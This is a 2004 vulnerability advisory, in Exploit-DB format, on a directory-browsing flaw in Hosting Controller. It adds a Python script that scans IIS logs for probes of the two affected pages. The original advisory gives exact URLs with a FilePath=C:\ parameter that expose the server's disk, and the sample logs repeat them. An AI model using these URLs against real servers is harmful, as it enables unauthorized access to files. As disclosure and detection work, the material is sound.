vendor: Hosting Controller
by: (\/) Mouse
CVSS: 7.5 HIGH
Directory Browsing
CWE: 548
Product Name: Hosting Controller
Affected Version From: All versions
Affected Version To: Not specified
Patch Exists: YES
Platforms Tested: Windows
2004

Vulnerability in Hosting Controller allows directory browsing

The Hosting Controller software has a security flaw that allows attackers to browse any file and any directory on the server. The vulnerability exists in the admin/mail/Statsbrowse.asp and admin/iis/Generalbrowse.asp files. By manipulating the URL, an attacker can view the contents of the server's hard disk.

Mitigation:

The vendor has released a patch for this vulnerability. Users are advised to update their software to the latest version.
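
A detection check to go with the patch, as an added example that is not part of the original advisory or of Hosting Controller: it scans IIS W3C extended logs for requests to the two browse pages whose FilePath resolves outside an expected directory. ALLOWED_BASE, the logged field layout and the sample log lines are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import parse_qs

# The two pages named in the advisory (IIS matches paths case-insensitively).
BROWSE_PAGES = ("/admin/mail/statsbrowse.asp", "/admin/iis/generalbrowse.asp")
# Assumption: directory the browse pages should be confined to on this server.
ALLOWED_BASE = r"D:\HostingSpaces"

# Constructed sample in IIS W3C extended format (not real traffic).
CONSTRUCTED_LOG = r"""#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2004-12-08 10:01:12 192.0.2.10 - GET /admin/main.asp - 200
2004-12-08 10:01:40 192.0.2.10 - GET /admin/mail/Statsbrowse.asp FilePath=c:\&Opt=3&level=1&upflag=0 200
2004-12-08 10:02:03 192.0.2.10 - GET /admin/iis/Generalbrowse.asp FilePath=C:%5C 200
2004-12-08 10:05:30 198.51.100.7 - GET /admin/iis/generalbrowse.asp FilePath=D:%5CHostingSpaces%5Csite2 200
""".splitlines()

def outside_base(file_path, base=ALLOWED_BASE):
    """True when a Windows path resolves outside `base` (other drive, UNC, '..')."""
    # ntpath applies Windows path rules on any OS; join() lets an absolute
    # or drive-qualified FilePath replace the base, as Windows would.
    full = ntpath.normcase(ntpath.normpath(ntpath.join(base, file_path)))
    root = ntpath.normcase(ntpath.normpath(base))
    return not (full == root or full.startswith(root + "\\"))

def scan_w3c(lines, base=ALLOWED_BASE):
    """Yield (date, time, client_ip, FilePath) for browse requests leaving `base`."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-uri-stem", "").lower() not in BROWSE_PAGES:
            continue
        # parse_qs percent-decodes values, so C:%5C and C:\ are treated alike.
        query = {k.lower(): v for k, v in parse_qs(rec.get("cs-uri-query", "")).items()}
        for value in query.get("filepath", []):
            if outside_base(value, base):
                yield (rec.get("date"), rec.get("time"), rec.get("c-ip"), value)

if __name__ == "__main__":
    for hit in scan_w3c(CONSTRUCTED_LOG):
        print(hit)
```

Hits on a patched server are still worth reviewing, since they show someone probing the old parameter.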

Exploit-DB raw data:

Advisory Information
-------------------------

Software Package   	: Hosting Controller
Vendor Homepage    	: http://www.hostingcontroller.com
Platforms          		: Windows based servers
Vulnerable Versions	: All versions (tested on v.6.1 Hotfix 1.4)
Vendor Contacted  	: 12/5/2004
Release Date       	: 12/7/2004

Summary
------------

Hosting Controller is a complete array of Web hosting automation tools
for the Windows Server family platform.
Hosting Controller has a security flaw which allows attackers to browse
any file and any directory on that server.

Details
---------

Vulnerability - Directory browsing of files on the system.
Foolish vulnerability:

1) This vulnerability is in admin/mail/Statsbrowse.asp, and attackers
can view the hard disk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0

2) This vulnerability is in admin/iis/Generalbrowse.asp, and attackers
can view the hard disk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\

Solution
----------

The vendor was notified and has released a patch.
Update your software.

Credits
---------

Discovered on May 6, 2004 by (\/) Mouse
Mouse@Shabgard.org
Additional Research: s7az2mm and bl2k
http://Shabgard.org

References
-------------

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt

# milw0rm.com [2004-12-05]